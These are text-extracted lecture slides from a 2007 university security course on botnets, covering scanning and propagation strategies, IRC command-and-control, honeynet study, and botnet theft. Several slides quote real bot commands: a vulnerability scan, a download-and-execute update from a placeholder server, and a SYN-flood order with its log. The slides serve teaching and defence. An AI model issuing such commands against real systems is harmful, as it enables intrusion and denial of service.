Title: 563'7'2 Bot Nets
1563.7.2Bot Nets
- Evgeni Peryshkin
- University of Illinois
- Fall 2007
2What Botnets do
- Denial of service (tribe flood trinu,
stacheldraht, trinity) - Adware
- Spyware
- E-mail spam
- Click fraud-or the purpose of generating a charge
per click without having actual interest in the
target of the ad's link - identity theft
- Spreading new malware start base for e-mail
virus
papers/bots
2
3Creation and use
wikipedia botnet
3
4Dramatis personae
Attacker(s)
IRC server
Handler
Handler
Agent
Agent
Agent
Victim
Agent-handler attack model
IRC-based attack model
Specht, Lee, 04
4
5Agent Recruitment - scanning strategy
- Random Scanning (Code Red)
- high traffic volume of inter-network traffic -
may aid detection - no coordination - increases likelihood of
duplicate scans - Hit List
- splits off pieces of the list to give to newly
recruited machines - can be very fast and efficient - no collisions
- a large list will cause more traffic, possibly
aiding detection - Permutation Scanning
- if an agent sees an already infected host, it
chooses a new random starting point - if an agent sees a certain threshold number of
infected hosts, it becomes dormant - Signpost Scanning
- uses communication patterns or data found on
newly infected hosts to select next targets - any email worm that spreads using address book of
infected host - hard to detect based on traffic patterns
- may be slow to spread
- Local Subnet (code red II, nimda)
Uiuc 563.9.1 DOS attacks Classification/Taxonomy
5
6Agent Recruitment - vulnerability scanning
- Horizontal
- looks for specific port/vulnerability
- Vertical
- look for multiple ports/vulnerabilities on the
same host - Coordinated
- scan multiple machines on the same subnet for a
specific vulnerability - Stealthy
- any of the above, but do it slowly to avoid
detection
Uiuc 563.9.1 DOS attacks Classification/Taxonomy
6
7Agent Recruitment - attack code propagation
- Central Server (li0n worm)
- all newly recruited agents contact a central
server to get attack code - single point of failure
- can be discovered and shut down
- high load at central server may limit efficiency
or enable detection - Back-chaining (ramen, morris worms)
- attack code downloaded from machine that was used
to exploit the new host - Autonomous (Code Red, Warhol, various email
worms) - attack code downloaded concurrently w/exploit
Uiuc 563.9.1 DOS attacks Classification/Taxonomy
7
8How to study bot nets
- Create honeynet interactive honeypot
- Data Control contain malicous activity
- Your node
- Data Capture store what user is doing
- Data Analysis interpret data captured
- Data Collection send data captured to organized
source
papers/honeynet
8
9How IRC controlled Bot nets grow
- Compromise host
- Use tftp/ftp/http/Csend to transfer itself to
compromised host - Start binary, which connects to hard-coded master
server (using dynamic DNS name) - Bot contact server, server send info about itself
including features understood - Bot logins in to masters channel with password
papers/bots
9
10How IRC controlled Bot nets grow 2
- topic of the channel interprets as a command for
bot. - Example advscan lsass 200 5 0 -r -s
- Use use 200 threads to search for lsass
vunerability every 5 seconds. s for silent to
reduce traffic. Add more hosts to botnet. - Example 2".http.update http//ltservergt/mugenxu/r
Bot.exe c\msy32awds.exe 1" - Download binary file and execute to update bot.
- Generally bots dont spread unless told so.
papers/bots
10
11How IRC controlled Bot nets grow 3
- If requested, bot tell server of spread.
- IRC server will provide the channels userlist.
(channel operators to save traffic and disguise
number bots) - Before commands sent controller has to
authenticate with bots over irc channel. - Example .la plmp -s
- -s no fail reply to reduce traffic
papers/bots
11
12How IRC controlled Bot nets grow 4
- Irc server(s) is compromised machine.
- Flexibility of own irc server. Harder to trace to
attacker. - Beginners- bot-network on original irdD
- 1,200 clients named rbotltgt report scanning
results. (easy to discover) - Top bot-net irc server Unreal IRCd and
ConferenceRoom
papers/bots
12
13Different kinds of Bots -popular
- Agobot/Phatbot/Forbot/XtremBot tidy GPL c,
tidy abstract design, modular and easy to add
commands - SDBot/RBot/UrBot/UrXBot/... most active, messy
c, GPL - mIRC-based Bots - GT-Bots launch mIRC
chat-client, hidewindown executable to hide mIRC
papers/bots
13
14Bot net size
- Dutch police found a 1.5 million node botnet
- Norwegian ISP Telenor disbanded a 10,000-node
botnet - Of the 600 million computers currently on the
internet, between 100 and 150 million were
already part of these botnets, Mr Cerf said. - Generally 50k is large for botnet
bbc
papers/bots
14
15Botnet vs Botnet
- If machine part of 2 botnets, packet sniffing
allows to gather the key information of the other
botnet. Thus it is possible to "steal" another
botnet. - Stealing is easier than building out one
- Some actually "secure" the bot machines
- Install patches
- shut down open ports
- DDOS to kidnap over bots.
Honeynet dark reading one on one
15
15
16New Botnets
- Shift from IRC to http/peer to peer
- Peer to peer more popular- not centralized, bots
forwards commands to other bots.
dark reading
17Example DDos attack
- FOO ltnicknamegt .scanstop
- FOO ltnicknamegt .ddos.syn 151.49.8.XXX 21
200 - FOO lt-XP-18330gt DDoS Flooding
(151.49.8.XXX21) for 200 seconds ...
FOO lt-2K-33820gt DDoS Done with flood
(2573KB/sec). FOO lt-XP-86840gt DDoS
Done with flood (351KB/sec).
papers/bots
18Lessons learned
- Botnets stolen frequently. If get password and
channel name, can instruct bot to upgrade to your
botnet software. (fun to watch bot steal bots) - Updates frequent- one update killed botnet,
invalid 1 char in nickname. - Unskilled people run botnets. (username, own
servers, own webserver for updates) - often botnets are run by young males with
surprisingly limited programming skills. ("How
can i compile " )
papers/bots
19Suggested Readings
- http//honeynet.thalix.com/papers/honeynet/index.h
tml - http//www.honeynet.org/papers/bots/
- http//en.wikipedia.org/wiki/Bot_net
- http//news.bbc.co.uk/2/hi/business/6298641.stm
- http//www.wired.com/politics/security/magazine/15
-09/ff_estonia
19